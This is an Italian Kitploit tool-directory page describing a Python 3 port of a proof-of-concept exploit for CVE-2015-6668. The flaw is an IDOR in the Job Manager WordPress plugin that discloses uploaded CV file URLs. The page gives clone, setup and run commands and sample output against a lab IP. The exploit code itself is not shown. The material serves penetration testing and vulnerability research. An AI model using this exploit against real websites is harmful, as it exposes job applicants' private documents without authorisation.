Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2015-6668 — Evangelos Mourikis POC per CVE-2015-6668 convertito per Python 3 | Kitploit
Strumenti/GitHubGitHub/jimdiroffii/cve-2015-6668
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration Testing
GitHubjimdiroffii/cve-2015-6668

CVE-2015-6668

Evangelos Mourikis POC per CVE-2015-6668 convertito per Python 3

Vedi Repository
2 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2015-6668

POC di Evangelos Mourikis per CVE-2015-6668 convertito per Python 3

Sfrutta la vulnerabilità IDOR nel plugin Job Manager per Wordpress.

Testato su Python 3.11.9

Riferimenti

NIST CVE WPScan Vuln DB

Configurazione e Utilizzo

Clona il repository, configura un ambiente virtuale (se desiderato), installa requests ed esegui lo script con Python 3.

Clona

root@kitploit:~
git clone https://github.com/jimdiroffii/CVE-2015-6668.git
cd CVE-2015-6668

Ambiente Virtuale Python (opzionale)

root@kitploit:~
python3 -m venv .venv
  • Bash
root@kitploit:~
source .venv/bin/activate
  • Powershell
root@kitploit:~
.\.venv\Scripts\activate

Installa requests

root@kitploit:~
python3 -m pip install requests

Esegui exploit.py

root@kitploit:~
python3 ./exploit.py

Output

root@kitploit:~
$ python3 ./exploit.py
CVE-2015-6668
Title: CV filename disclosure on Job-Manager WP Plugin
Author: Evangelos Mourikis
Blog: https://vagmour.eu
Plugin URL: http://www.wp-jobmanager.com
Versions: <=0.7.25

Enter a vulnerable website: http://10.10.10.10
Enter a file name: HackerAccessGranted
[+] URL of CV found! http://10.10.10.10/wp-content/uploads/2017/04/HackerAccessGranted.jpg
Scarica lo strumento